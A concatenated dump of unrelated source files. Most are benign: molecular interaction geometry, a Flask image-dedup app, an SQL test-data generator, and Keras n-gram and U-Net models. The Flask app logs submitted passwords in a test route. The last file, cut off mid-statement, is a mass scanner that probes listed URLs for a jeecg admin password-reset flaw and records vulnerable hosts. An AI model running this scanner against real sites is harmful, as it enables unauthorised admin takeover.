calc_centroid(arom_a_coords)\n norm = calc_arom_norm(arom_coords)\n # get the direction facing the other centroid\n\ndef calc_aroms_centroid_offset(arom_a_coords, arom_b_coords):\n \"\"\"Project the centers of each ring over each other and get\n the offset\"\"\"\n\n # get the centroid coordinates\n centroid_a, centroid_b = [calc_centroid(arom_coords) for\n arom_coords in (arom_a_coords, arom_b_coords)]\n\n # get the norms that are facing each other\n face_norm_a, face_norm_b = calc_arom_facing_norms(arom_a_coords, arom_b_coords)\n\n # the vector going from centroid a to b\n centroid_vec_a = centroid_b - centroid_a\n # vector from b to a\n centroid_vec_b = centroid_a - centroid_b\n\n # calculate the rejection of the centroid vector on the normal\n # face vector, which is the projection on the plane defined by the\n # normal vector in the direction of the centroid vector\n norm_a_proj = calc_vector_rejection(centroid_vec_a, face_norm_a)\n norm_b_proj = calc_vector_rejection(centroid_vec_b, face_norm_b)\n\n # compare the magnitudes of the two\n centroid_offset = min(la.norm(norm_a_proj), la.norm(norm_b_proj))\n\n return centroid_offset\n\ndef calc_vector_rejection(vec_a, vec_b):\n \"\"\"Reject vec_a onto vec_b\"\"\"\n\n projection_vec = calc_vector_projection(vec_a, vec_b)\n # a_2 = a - a_1\n return vec_a - projection_vec\n\ndef calc_vector_projection(vec_a, vec_b):\n \"\"\"Project vec_a onto vec_b.\"\"\"\n\n # a_1 = (a dot b_norm) dot b_norm\n vec_b_norm = vec_b / la.norm(vec_b)\n return np.dot(np.dot(vec_a, vec_b_norm), vec_b_norm)\n\ndef calc_facing_vector(vec_up, point):\n vec_down = -1 * vec_up\n\n d_up = euclidean(vec_up, point)\n d_down = euclidean(vec_down, point)\n\n face_vec = vec_up if d_up < d_down else vec_down\n return face_vec\n\ndef calc_arom_facing_norms(arom_a_coords, arom_b_coords):\n \"\"\"Given two aromatic rings get the normal vectors that face the other ring\"\"\"\n\n centroids = [calc_centroid(arom_coords) for arom_coords in [arom_a_coords, arom_b_coords]]\n arom_norms = calc_arom_norms(arom_a_coords, arom_b_coords)\n\n face_norms = []\n for i, arom_norm in enumerate(arom_norms):\n # get the index of the other arom\n j = 1 if i ==0 else 0\n norm = calc_facing_vector(arom_norm + centroids[i], centroids[j])\n # norm_up = arom_norm\n # norm_down = -1 * arom_norm\n # # get the norm so that it points to the other ring\n # d_up = euclidean(norm_up + centroids[i], centroids[j])\n # d_down = cdist(norm_down + centroids[i], centroids[j])\n # norm = norm_up if d_up < d_down else norm_down\n face_norms.append(norm)\n\n return face_norms\n\ndef calc_centroid(atom_coords):\n return atom_coords.mean(axis=0)\n\ndef calc_centroid_distance(arom_a_coords, arom_b_coords):\n centroid_a, centroid_b = calc_centroids(arom_a_coords, arom_b_coords)\n centroid_distance = cdist([centroid_a], [centroid_b])[0,0]\n return centroid_distance\n\ndef calc_arom_norms(arom_a_coords, arom_b_coords):\n # Calculate and check the angle between the two ring normal vectors\n\n centroids = calc_centroids(arom_a_coords, arom_b_coords)\n\n arom_norms = []\n for i, arom_coords in enumerate([arom_a_coords, arom_b_coords]):\n # get the coordinates of two atoms on the ring\n a0 = arom_coords[0]\n if len(arom_coords) in [6,5]:\n a1 = arom_coords[2]\n else:\n raise InteractionError(\"aromatic rings without 5 or 6 atoms not supported\")\n\n # get two plane vectors\n a0c = a0 - centroids[i]\n a1c = a1 - centroids[i]\n norm = np.cross(a0c, a1c)\n arom_norms.append(norm)\n\n return tuple(arom_norms)\n\ndef calc_arom_norm(arom_coords):\n centroid = calc_centroid(arom_coords)\n\n a0 = arom_coords[0]\n if len(arom_coords) in [6,5]:\n a1 = arom_coords[2]\n else:\n raise InteractionError(\"aromatic rings without 5 or 6 atoms not supported\")\n\n a0c = a0 - centroid\n a1c = a1 - centroid\n norm = np.cross(a0c, a1c)\n return norm\n\ndef calc_angle(v1, v2):\n try:\n # flip one of them because it is opposite the other\n angle = np.degrees(np.arccos(\n np.dot(v1, v2)/(la.norm(\n v1) * la.norm(v2))))\n except RuntimeWarning:\n print(\"v1: {0} \\n\"\n \"v2: {1}\".format(v1, v2))\n\n return angle\n\ndef calc_arom_normal_angle(arom_a_coords, arom_b_coords):\n\n # get the normal vectors\n arom_norm_a, arom_norm_b = calc_arom_norms(arom_a_coords, arom_b_coords)\n arom_norm_b = -1 * arom_norm_b\n ring_normal_angle = calc_angle(arom_norm_a, arom_norm_b)\n\n # if normals happen to be opposite directions correct and get\n # the angle that is non-negative and smallest\n alt_angle = 180 - ring_normal_angle\n ring_normal_angle = min(ring_normal_angle, alt_angle) if not\\\n alt_angle < 0 else ring_normal_angle\n\n return ring_normal_angle\n\n\nclass PiCationInx(Interaction):\n \"\"\"Substantiates PiCationType by selecting donor and acceptor\n features, as well as the involved Hydrogen atom.\n\n \"\"\"\n\n interaction_type = PiCationType\n\n def __init__(self, arom_a, arom_b,\n check=True,\n interaction_class=None,\n **param_values):\n\n if check:\n # use the default settings for the interaction_type only\n # for implicit checks, the idea is that we want the user\n # to mutate the InteractionType to change the\n # classification criteria\n okay, param_values = self.interaction_type.check(arom_a.atoms,\n arom_b.atoms,)\n\n if not okay:\n raise InteractionError\n\n # success, finish creating interaction\n atom_system = arom_a.system\n super().__init__(features=[arom_a, arom_b],\n interaction_type=self.interaction_type,\n system=atom_system,\n **param_values)\n self._arom_a = arom_a\n self._arom_b = arom_b\n\n @property\n def arom_a(self):\n return self._arom_a\n @property\n def arom_b(self):\n return self._arom_b\n\n @property\n def record(self):\n record_fields = ['interaction_class'] + \\\n self.interaction_type.interaction_param_keys\n\n PiCationInxRecord = namedtuple('PiCationInxRecord', record_fields)\n record_attr = {'interaction_class' : self.interaction_class.name}\n\n return PiCationInxRecord(**record_attr, **self.interaction_params)\n","sub_path":"mastic/interactions/pi_cation.py","file_name":"pi_cation.py","file_ext":"py","file_size_in_byte":12675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"128196311","text":"import os\nimport argparse\n\nfrom flask import Flask, request, jsonify, render_template\n\nfrom .dedup_utils import filter_dedup, move_to_dedup, del_from_dedup\n\napp = Flask('imagededup-browser')\n\n\n@app.get('/')\n@app.get('/')\ndef index(alg=None):\n return render_template('index.html', alg=alg)\n\n\n@app.get('/filter/')\ndef get_filter(alg='phash'):\n _filter = filter_dedup(app.static_folder, alg)\n return jsonify(_filter)\n\n\n@app.put('/move')\ndef move():\n res = move_to_dedup(app.static_folder, request.form.get('img'))\n return jsonify({'result': res})\n\n\n@app.delete('/delete')\ndef delete():\n _del = del_from_dedup(app.static_folder, request.form.get('img'))\n return jsonify(_del)\n\n\n# ################ 测试接口 ###################\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n if request.method == 'GET':\n return render_template('login.html')\n else:\n account = request.form.get('account')\n password = request.form.get('password')\n print('account = %s' % account)\n print('password = %s' % password)\n return render_template('login.html', result='登陆失败')\n\n\n@app.get('/testget')\ndef test_get():\n return jsonify(request.args)\n\n\n@app.post('/testpost')\ndef test_post():\n print(app.static_folder)\n print(request.form)\n return jsonify(request.form)\n\n\ndef run_server(folder):\n print(folder)\n app.static_folder = folder\n app.template_folder = os.path.join(os.path.dirname(__file__), 'templates')\n app.run(port=8000, debug=True)\n\n\ndef main():\n parser = argparse.ArgumentParser(description='starting a local website to browser images', prog='flask-web')\n parser.add_argument('direct', help='images dir')\n args = parser.parse_args()\n image_dir = args.direct\n if not os.path.isdir(image_dir):\n print(\"'%s' is not a dir\" % image_dir)\n else:\n run_server(image_dir)\n","sub_path":"src/dedup/webapp.py","file_name":"webapp.py","file_ext":"py","file_size_in_byte":1900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"572409441","text":"from random import Random\nfrom datetime import datetime, timedelta, time\nfrom faker import Faker\nfrom Client import *\nfrom Participant import *\nfrom ConfDay import *\nfrom Conf import *\nfrom ConfData import *\nfrom Location import *\nfrom DayRes import *\nfrom Admission import *\nfrom Workshop import *\nfrom WorksRes import *\nfrom WorksAdmission import *\nfrom Payment import *\nfrom ConfPrice import *\n\nfaker = Faker()\nrand = Random()\n\nnextDayResID = 1\nnextWorksResID = 1\nnextDayID = 1\nnextWorksID = 1\n\nTOTAL_LOCATIONS = 5\nTOTAL_CLIENTS = 999\nTOTAL_PARTICIPANTS = 999\n\ndef genClients(n = TOTAL_CLIENTS, nextcid=1):\n ncid = nextcid\n res = 'SET IDENTITY_INSERT Klient ON'\n cl = Client(ncid, faker)\n res += '\\n'\n res += cl.to_sql()\n res += ','\n ncid += 1\n for i in range(n-1):\n cl = Client(ncid, faker)\n res += '\\n'\n res += cl.to_sql(False)\n if i != n-2:\n res += ','\n ncid += 1\n\n res += \"\\n\"\n res += '\\nSET IDENTITY_INSERT Klient OFF'\n res += \"\\n\"\n return res\n\ndef genParticipants(n = TOTAL_PARTICIPANTS, nextpid=1):\n npid = nextpid\n res = 'SET IDENTITY_INSERT Uczestnicy ON'\n pa = Participant(npid, faker)\n res += '\\n'\n res += pa.to_sql()\n res += ','\n npid += 1\n for i in range(n - 1):\n pa = Participant(npid, faker)\n res += '\\n'\n res += pa.to_sql(False)\n if i != n - 2:\n res += ','\n npid += 1\n\n res += \"\\n\"\n res += '\\nSET IDENTITY_INSERT Uczestnicy OFF'\n res += \"\\n\"\n return res\n\n\ndef genConfDay(cid, conf, date):\n #print('genconfday')\n res = ''\n global nextDayID\n global nextDayResID\n global nextWorksID\n global nextWorksResID\n cd = ConferenceDay(nextDayID, cid, faker, rand, date)\n nextDayID += 1\n res += '\\n'\n res += 'SET IDENTITY_INSERT DzienKonferencji ON'\n res += '\\n'\n res += cd.to_sql()\n res += '\\n'\n res += 'SET IDENTITY_INSERT DzienKonferencji OFF'\n res += \"\\n\"\n\n # Generate Workshops for the day\n for i in range(rand.randint(1, 5)):\n ws = Workshop(nextWorksID, cd, faker, rand)\n cd.workshops.append(ws)\n nextWorksID += 1\n res += \"\\n\"\n res += 'SET IDENTITY_INSERT Warsztat ON'\n res += \"\\n\"\n res += ws.to_sql()\n res += \"\\n\"\n res += 'SET IDENTITY_INSERT Warsztat OFF'\n res += \"\\n\"\n\n while cd.freeseats > 0: # Generate reservations for the generated day\n # print('gendayres')\n parts = randint(1, cd.freeseats)\n students = randint(0, parts)\n\n sleft = students\n cd.freeseats -= parts\n res += '\\n'\n res += 'SET IDENTITY_INSERT RezerwacjeKonferencji ON'\n res += '\\n'\n dr = ConfDayReservation(nextDayResID, randint(1, 2997), cd, parts, students, faker, rand)\n dr.price += (conf.baseprice * (parts - students)) + (conf.baseprice * 0.5 * students)\n res += dr.to_sql()\n res += '\\n'\n res += 'SET IDENTITY_INSERT RezerwacjeKonferencji OFF'\n res += '\\n'\n\n # Generate admissions for generated reservation\n participants = rand.sample(range(1, 14985), parts)\n dr.participants = participants\n #print('genadms')\n for p in participants:\n if sleft > 0:\n adm = Admission(p, nextDayResID, 1)\n res += \"\\n\"\n res += adm.to_sql()\n #print('admtosql')\n res += \"\\n\"\n sleft -= 1\n else:\n adm = Admission(p, nextDayResID, 0)\n res += \"\\n\"\n res += adm.to_sql()\n #print('admtosql')\n res += \"\\n\"\n\n # Generate Workshop Reservations for generated reservation\n works_num = randint(0, len(cd.workshops))\n wshops = rand.sample(cd.workshops, works_num)\n for w in wshops:\n if(w.freeseats > 0):\n particips = rand.randint(1, min(w.freeseats, len(dr.participants)))\n w.freeseats -= particips\n dr.price += particips * w.baseprice\n res += \"\\n\"\n res += 'SET IDENTITY_INSERT RezerwacjeWarsztatow ON'\n res += \"\\n\"\n wres = WorksReservation(nextWorksResID, w.work_id, dr, particips, faker, rand)\n res += wres.to_sql()\n res += \"\\n\"\n res += 'SET IDENTITY_INSERT RezerwacjeWarsztatow OFF'\n res += \"\\n\"\n\n # Generate workshop admissions for generated workshop reservation\n wparts = rand.sample(dr.participants, particips)\n for wp in wparts:\n wadm = WorksAdmission(wp, wres.workres_id)\n res += \"\\n\"\n res += wadm.to_sql()\n # print('wadmtosql')\n res += \"\\n\"\n nextWorksResID += 1\n\n # Generate payment for generated reservation\n res += \"\\n\"\n pay = Payment(dr.price, dr.date, dr.res_id, faker, rand)\n res += pay.to_sql()\n res += \"\\n\"\n\n nextDayResID += 1\n\n\n\n res += \"\\n\"\n\n return res\n\ndef genLocations(n = TOTAL_LOCATIONS):\n loc = Location()\n res = ''\n res += \"\\n\"\n res += loc.to_sql()\n res += \",\"\n for i in range(n - 1):\n loc = Location()\n res += '\\n'\n res += loc.to_sql(False)\n if i != n - 2:\n res += ','\n res += \"\\n\"\n return res\n\n\ndef genConfData(cid):\n res = ''\n cdt = ConferenceData(cid, faker)\n res += \"\\n\"\n res += cdt.to_sql()\n res += \"\\n\"\n return res\n\ndef genConf(nextcid, locnum=TOTAL_LOCATIONS):\n #print('genconf')\n ncid = nextcid\n res = 'SET IDENTITY_INSERT Konferencje ON'\n sdate = faker.date_between(start_date='-5y', end_date='today')\n days = randint(1, 5)\n edate = sdate + timedelta(days=days-1)\n price = round(random.uniform(10.0, 1000.0), 2)\n cf = Conference(ncid, randint(1, locnum), sdate, edate, price, faker)\n res += '\\n'\n res += cf.to_sql()\n res += \"\\n\"\n res += '\\nSET IDENTITY_INSERT Konferencje OFF'\n for i in range(days):\n res += \"\\n\"\n res += genConfDay(ncid, cf, sdate)\n sdate += timedelta(days=1)\n res += \"\\n\"\n res += genConfData(ncid)\n\n pcs = rand.randint(1, 4)\n dts = rand.sample(range(9), pcs)\n for i in range(pcs):\n res += \"\\n\"\n cp = ConferencePrice(ncid, dts[i], faker, rand)\n res += cp.to_sql()\n res += \"\\n\"\n\n return res\n\nfile_obj = open(\"res.sql\",'w')\n\n\n# print(genConf(1))\nfor o in range(72):\n #print(genConf(o+1))\n file_obj.write(genConf(o+1))\n\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"608556122","text":"# -*- coding: utf-8 -*-\n'''\nРешение задачи https://github.com/Koziev/WordRepresentations с помощью нейросетки на Keras.\n\nПроверяется только один вариант представления слов - sparse distributed representation.\n\nТак как проверяемые представления слов (sparse distributed representations) имеют\nочень большую размерность (1024 или больше), то сгенерировать сразу тренировочную\nматрицу для всех сэмплов в памяти не возможно. Поэтому генерируем датасеты порциями\nи используем специальные методы в Keras модели - fit_generator и evaluate_generator.\nГенератор порций реализован в функции generate_rows. За основу берется представление\nслов индексами в лексиконе (класс WordIndeces_Vectorizer). Далее каждая порция создается\nпростой заменой индекса на вектор соответствующего слова.\n\n(c) Козиев Илья inkoziev@gmail.com\n'''\n\nfrom __future__ import print_function\nimport gc\nimport sklearn\nimport codecs\nimport random\nimport sys\nimport numpy as np\nfrom keras.layers import Dense, Dropout, Input, Flatten\nfrom keras.layers.core import Reshape\nfrom keras.layers.merge import concatenate\nfrom keras.layers import Embedding\nfrom keras.callbacks import ModelCheckpoint, EarlyStopping\nfrom keras.layers.normalization import BatchNormalization\nfrom keras.models import Model\nfrom keras.layers import Conv1D, GlobalMaxPooling1D, GlobalAveragePooling1D, MaxPooling1D, AveragePooling1D\nfrom DatasetVectorizers import WordIndeces_Vectorizer\nfrom DatasetSplitter import split_dataset\nimport CorpusReaders\n\n\n\n# арность N-грамм\nNGRAM_ORDER = 3\n\n# кол-во сэмплов в датасете\nNB_SAMPLES = 10000000\n\n# Архитектура нейросети\nNET_ARCH = 'MLP' # 'MLP' | 'CNN'\n\n# -----------------------------------------------------------------------\n\ndef generate_rows(X, sdr_vec_len, y, index2word, word2sdr, batch_size):\n \"\"\"\n Генератор порций данных для обучения и валидации.\n \n \n :param X: полный списк N-грамм, каждое слово представлено целочисленным индексом\n :param sdr_vec_len: длина вектора представления слова\n :param y: список эталонных значений классификации для N-грамм в X\n :param index2word: словарь для получения текстового представления слова по его индексу в X\n :param word2sdr: словарь для получения вектора слова\n :param batch_size: размер генерируемых порций\n :return: пара матриц X_batch и y_batch\n \"\"\"\n nrow = X.shape[0]\n ngram_arity = X.shape[1]\n input_size = ngram_arity*sdr_vec_len\n nb_batch = int(nrow/batch_size)\n\n X_batch = np.zeros( (batch_size, input_size), dtype=np.bool )\n y_batch = np.zeros( (batch_size), dtype=np.bool )\n\n #try:\n while True:\n indeces = range(nrow)\n random.shuffle(indeces)\n\n for ibatch in range(nb_batch):\n\n X_batch.fill(0)\n y_batch.fill(0)\n\n for irow in range(batch_size):\n ii = ibatch*batch_size + irow\n ngram = X[ii,:]\n for j in range(ngram_arity):\n word = index2word[ngram[j]]\n if word in word2sdr:\n X_batch[irow, j*sdr_vec_len:(j+1)*sdr_vec_len] = word2sdr[word]\n\n y_batch[irow] = y[ii]\n\n yield ({'input_layer': X_batch}, {'output_layer': y_batch})\n\n #except:\n # print( 'Unexpected error: {}'.format( sys.exc_info()[0] ) )\n # raise\n\n# -----------------------------------------------------------------------\n\ndef build_model( input_size ):\n\n x_input = Input(shape=(input_size,), dtype='float32', name='input_layer')\n ndense = input_size\n\n print('Building MLP...')\n net = Dense(units=ndense, activation='relu')(x_input)\n #net = BatchNormalization()(net)\n net = Dense(units=int(ndense / 2), activation='relu')(net)\n #net = BatchNormalization()(net)\n net = Dense(units=int(ndense / 3), activation='relu')(net)\n #net = BatchNormalization()(net)\n net = Dense( units=int(ndense/4), activation='relu' )(net)\n #net = BatchNormalization()(net)\n net = Dense(units=1, activation='sigmoid', name='output_layer')(net)\n\n model = Model(inputs=x_input, outputs=net)\n model.compile(loss='binary_crossentropy', optimizer='rmsprop', metrics=['accuracy'])\n return model\n\n\n# -----------------------------------------------------------------------\n\ncorpus_reader = CorpusReaders.ZippedCorpusReader('../data/corpus.txt.zip')\n#corpus_reader = CorpusReaders.TxtCorpusReader(r'f:\\Corpus\\Raw\\ru\\tokenized_w2v.txt')\n\n\ndataset_generator = WordIndeces_Vectorizer()\nX_data,y_data = dataset_generator.vectorize_dataset(corpus_reader=corpus_reader, ngram_order=NGRAM_ORDER, nb_samples=NB_SAMPLES)\ngc.collect()\nX_train, y_train, X_val, y_val, X_holdout, y_holdout = split_dataset(X_data, y_data )\nngram_arity = dataset_generator.get_ngram_arity()\ngc.collect()\n\nword2id = dataset_generator.get_vocabulary()\n# Нам нужны SDR векторы только для этих слов.\nngram_words = set(word2id.keys())\nindex2word = dict( (i,w) for (w,i) in word2id.iteritems() )\n\n\n# Грузим SDR.\n# TODO: вынести загрузчик в отдельный класс.\nsdr_path = r'/home/eek/polygon/WordSDR2/sdr.dat'\nprint('Loading SDRs...')\nword2sdr = dict()\nwith codecs.open(sdr_path, 'r', 'utf-8') as rdr:\n line0 = rdr.readline().strip()\n toks = line0.split(u' ')\n nword = int(toks[0])\n veclen = int(toks[1])\n for line in rdr:\n tx = line.strip().split()\n word = tx[0]\n if word in ngram_words:\n vec = [(True if float(z) > 0.0 else False) for z in tx[1:]]\n vec = np.asarray(vec, dtype=np.bool)\n word2sdr[word] = vec\n\ninput_size = veclen * ngram_arity\n\n# Создаем сетку нужной архитектуры\nmodel = build_model(input_size)\n\nweights_filename = 'wr_keras.model'\n\nprint('Train...')\n\n# Генерируем батчи из обучающего набора.\n# Перед каждой эпохой тасуем обучающие N-граммы.\n\nbatch_size = 200\nsteps_per_epoch = int(X_train.shape[0]/batch_size)\n\n\nmodel_checkpoint = ModelCheckpoint( weights_filename, monitor='val_acc', verbose=1,\n save_best_only=True, mode='auto')\nearly_stopping = EarlyStopping(monitor='val_acc', patience=5, verbose=1, mode='auto')\n\n\nmodel.fit_generator( generator=generate_rows(X_train, veclen, y_train, index2word, word2sdr, batch_size),\n steps_per_epoch=steps_per_epoch,\n epochs=100,\n verbose=1,\n callbacks=[model_checkpoint, early_stopping],\n validation_data=generate_rows(X_val, veclen, y_val, index2word, word2sdr, batch_size),\n validation_steps=int(X_val.shape[0]/batch_size),\n )\n #class_weight=None,\n #max_queue_size=10,\n #workers=1,\n #use_multiprocessing=False,\n #initial_epoch=0 )\n\n\nmodel.load_weights(weights_filename)\n\nprint('Final evaluation...')\nres = model.evaluate_generator( generator=generate_rows(X_holdout, veclen, y_holdout, index2word, word2sdr, batch_size),\n steps=int(X_holdout.shape[0]/batch_size) )\n\nprint('holdout acc={}'.format(res[model.metrics_names.index('acc')]))\n","sub_path":"PyModels/wr_keras_sdr2.py","file_name":"wr_keras_sdr2.py","file_ext":"py","file_size_in_byte":8091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"247947356","text":"import tensorflow as tf \nimport keras.backend.tensorflow_backend as KTF \n \nKTF.set_session(tf.Session(config=tf.ConfigProto(device_count={'gpu':0}))) \n\n\nimport cv2\nimport os\nimport numpy as np\n\n\ndef make_df(train_path, test_path, img_size):\n train_ids = next(os.walk(train_path))[1]\n test_ids = next(os.walk(test_path))[1]\n X_train = np.zeros((len(train_ids), img_size, img_size, 3), dtype=np.uint8)\n Y_train = np.zeros((len(train_ids), img_size, img_size, 1), dtype=np.bool)\n for i, id_ in enumerate(train_ids):\n path = train_path + id_\n img = cv2.imread(path + '/images/' + id_ + '.png')\n img = cv2.resize(img, (img_size, img_size))\n X_train[i] = img\n mask = np.zeros((img_size, img_size, 1), dtype=np.bool)\n for mask_file in next(os.walk(path + '/masks/'))[2]:\n mask_ = cv2.imread(path + '/masks/' + mask_file, 0)\n mask_ = cv2.resize(mask_, (img_size, img_size))\n mask_ = mask_[:, :, np.newaxis]\n mask = np.maximum(mask, mask_)\n Y_train[i] = mask\n X_test = np.zeros((len(test_ids), img_size, img_size, 3), dtype=np.uint8)\n sizes_test = []\n for i, id_ in enumerate(test_ids):\n path = test_path + id_\n img = cv2.imread(path + '/images/' + id_ + '.png')\n sizes_test.append([img.shape[0], img.shape[1]])\n img = cv2.resize(img, (img_size, img_size))\n X_test[i] = img\n\n return X_train, Y_train, X_test, sizes_test\n\nfrom keras.layers.convolutional import Conv2D, Conv2DTranspose\nfrom keras.layers.pooling import MaxPooling2D\nfrom keras.layers.merge import concatenate\nfrom keras.models import Model\nfrom keras.layers import Input\nfrom keras.layers.core import Dropout, Lambda\n\n\ndef Unet(img_size):\n inputs = Input((img_size, img_size, 3))\n s = Lambda(lambda x: x / 255)(inputs)\n\n c1 = Conv2D(16, (3, 3), activation='elu', kernel_initializer='he_normal', padding='same')(s)\n c1 = Dropout(0.1)(c1)\n c1 = Conv2D(16, (3, 3), activation='elu', kernel_initializer='he_normal', padding='same')(c1)\n p1 = MaxPooling2D((2, 2))(c1)\n\n c2 = Conv2D(32, (3, 3), activation='elu', kernel_initializer='he_normal', padding='same')(p1)\n c2 = Dropout(0.1)(c2)\n c2 = Conv2D(32, (3, 3), activation='elu', kernel_initializer='he_normal', padding='same')(c2)\n p2 = MaxPooling2D((2, 2))(c2)\n\n c3 = Conv2D(64, (3, 3), activation='elu', kernel_initializer='he_normal', padding='same')(p2)\n c3 = Dropout(0.2)(c3)\n c3 = Conv2D(64, (3, 3), activation='elu', kernel_initializer='he_normal', padding='same')(c3)\n p3 = MaxPooling2D((2, 2))(c3)\n\n c4 = Conv2D(128, (3, 3), activation='elu', kernel_initializer='he_normal', padding='same')(p3)\n c4 = Dropout(0.2)(c4)\n c4 = Conv2D(128, (3, 3), activation='elu', kernel_initializer='he_normal', padding='same')(c4)\n p4 = MaxPooling2D(pool_size=(2, 2))(c4)\n\n c5 = Conv2D(256, (3, 3), activation='elu', kernel_initializer='he_normal', padding='same')(p4)\n c5 = Dropout(0.3)(c5)\n c5 = Conv2D(256, (3, 3), activation='elu', kernel_initializer='he_normal', padding='same')(c5)\n\n u6 = Conv2DTranspose(128, (2, 2), strides=(2, 2), padding='same')(c5)\n u6 = concatenate([u6, c4])\n c6 = Conv2D(128, (3, 3), activation='elu', kernel_initializer='he_normal', padding='same')(u6)\n c6 = Dropout(0.2)(c6)\n c6 = Conv2D(128, (3, 3), activation='elu', kernel_initializer='he_normal', padding='same')(c6)\n\n u7 = Conv2DTranspose(64, (2, 2), strides=(2, 2), padding='same')(c6)\n u7 = concatenate([u7, c3])\n c7 = Conv2D(64, (3, 3), activation='elu', kernel_initializer='he_normal', padding='same')(u7)\n c7 = Dropout(0.2)(c7)\n c7 = Conv2D(64, (3, 3), activation='elu', kernel_initializer='he_normal', padding='same')(c7)\n\n u8 = Conv2DTranspose(32, (2, 2), strides=(2, 2), padding='same')(c7)\n u8 = concatenate([u8, c2])\n c8 = Conv2D(32, (3, 3), activation='elu', kernel_initializer='he_normal', padding='same')(u8)\n c8 = Dropout(0.1)(c8)\n c8 = Conv2D(32, (3, 3), activation='elu', kernel_initializer='he_normal', padding='same')(c8)\n\n u9 = Conv2DTranspose(16, (2, 2), strides=(2, 2), padding='same')(c8)\n u9 = concatenate([u9, c1], axis=3)\n c9 = Conv2D(16, (3, 3), activation='elu', kernel_initializer='he_normal', padding='same')(u9)\n c9 = Dropout(0.1)(c9)\n c9 = Conv2D(16, (3, 3), activation='elu', kernel_initializer='he_normal', padding='same')(c9)\n\n outputs = Conv2D(1, (1, 1), activation='sigmoid')(c9)\n\n model = Model(inputs=[inputs], outputs=[outputs])\n\n return model\n\nfrom keras.preprocessing.image import ImageDataGenerator\n\n\ndef generator(xtr, xval, ytr, yval, batch_size):\n data_gen_args = dict(horizontal_flip=True,\n vertical_flip=True,\n rotation_range=90.,\n width_shift_range=0.1,\n height_shift_range=0.1,\n zoom_range=0.1)\n image_datagen = ImageDataGenerator(**data_gen_args)\n mask_datagen = ImageDataGenerator(**data_gen_args)\n image_datagen.fit(xtr, seed=7)\n mask_datagen.fit(ytr, seed=7)\n image_generator = image_datagen.flow(xtr, batch_size=batch_size, seed=7)\n mask_generator = mask_datagen.flow(ytr, batch_size=batch_size, seed=7)\n train_generator = zip(image_generator, mask_generator)\n\n val_gen_args = dict()\n image_datagen_val = ImageDataGenerator(**val_gen_args)\n mask_datagen_val = ImageDataGenerator(**val_gen_args)\n image_datagen_val.fit(xval, seed=7)\n mask_datagen_val.fit(yval, seed=7)\n image_generator_val = image_datagen_val.flow(xval, batch_size=batch_size, seed=7)\n mask_generator_val = mask_datagen_val.flow(yval, batch_size=batch_size, seed=7)\n val_generator = zip(image_generator_val, mask_generator_val)\n\n return train_generator, val_generator\n\nimport tensorflow as tf\nimport numpy as np\nfrom keras import backend as K\nfrom keras.losses import binary_crossentropy\n\n\ndef mean_iou(y_true, y_pred):\n prec = []\n for t in np.arange(0.5, 1.0, 0.05):\n y_pred_ = tf.to_int32(y_pred > t)\n score, up_opt = tf.metrics.mean_iou(y_true, y_pred_, 2)\n K.get_session().run(tf.local_variables_initializer())\n with tf.control_dependencies([up_opt]):\n score = tf.identity(score)\n prec.append(score)\n return K.mean(K.stack(prec))\n\ndef dice_coef(y_true, y_pred):\n smooth = 1.\n y_true_f = K.flatten(y_true)\n y_pred_f = K.flatten(y_pred)\n intersection = K.sum(y_true_f * y_pred_f)\n return (2. * intersection + smooth) / (K.sum(y_true_f) + K.sum(y_pred_f) + smooth)\n\ndef bce_dice_loss(y_true, y_pred):\n return 0.5 * binary_crossentropy(y_true, y_pred) - dice_coef(y_true, y_pred)\n\nfrom skimage.morphology import label\n\ndef rle_encoding(x):\n dots = np.where(x.T.flatten() == 1)[0]\n run_lengths = []\n prev = -2\n for b in dots:\n if (b>prev+1): run_lengths.extend((b + 1, 0))\n run_lengths[-1] += 1\n prev = b\n return run_lengths\n\ndef prob_to_rles(x, cutoff=0.5):\n lab_img = label(x > cutoff)\n for i in range(1, lab_img.max() + 1):\n yield rle_encoding(lab_img == i)\n\nimport cv2\nimport os\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\n\n\nif __name__ == \"__main__\":\n img_size = 320\n batch_size = 32\n train_path = '/home/u784799i/kaggle_new/stage1_train/'\n test_path = '/home/u784799i/kaggle_new/stage1_test/'\n \n X_train, Y_train, X_test, sizes_test = make_df(train_path, test_path, img_size)\n xtr, xval, ytr, yval = train_test_split(X_train, Y_train, test_size=0.1, random_state=7)\n train_generator, val_generator = generator(xtr, xval, ytr, yval, batch_size)\n \n model = Unet(img_size)\n model.summary()\n model.compile(optimizer='adam', loss=bce_dice_loss, metrics=[mean_iou])\n \n model.fit_generator(train_generator, steps_per_epoch=len(xtr)/6, epochs=40,\n validation_data=val_generator, validation_steps=len(xval)/batch_size)\n \n preds_test = model.predict(X_test, verbose=1)\n\n preds_test_upsampled = []\n for i in range(len(preds_test)):\n preds_test_upsampled.append(cv2.resize(preds_test[i], \n (sizes_test[i][1], sizes_test[i][0])))\n \n test_ids = next(os.walk(test_path))[1]\n new_test_ids = []\n rles = []\n for n, id_ in enumerate(test_ids):\n rle = list(prob_to_rles(preds_test_upsampled[n]))\n rles.extend(rle)\n new_test_ids.extend([id_] * len(rle))\n sub = pd.DataFrame()\n sub['ImageId'] = new_test_ids\n sub['EncodedPixels'] = pd.Series(rles).apply(lambda x: ' '.join(str(y) for y in x))\n sub.to_csv('sub.csv', index=False)\n","sub_path":"opencv_generator.py","file_name":"opencv_generator.py","file_ext":"py","file_size_in_byte":8703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"169431330","text":"\nimport json\nimport requests\n\n\nurls = open('url.txt')\n\npoc = '/action/usermanager.htm'\n\nfor i in urls:\n url = i.rstrip(\"\\n\")\n payload = \"/loginController.do?goPwdInit\"\n vulnurl = url + payload\n try:\n req = requests.get(vulnurl, timeout=10, verify=False)\n if r\"loginController.do?pwdInit\" in req.text:\n print(\"[+]存在jeecg 重置admin密码漏洞...(高危)\\tpayload: \" + vulnurl + \"\\tadmin:123456\", \"red\")\n with open('漏洞.txt', 'a')as f:\n f.write(str(vulnurl) + '\\n')\n else:\n 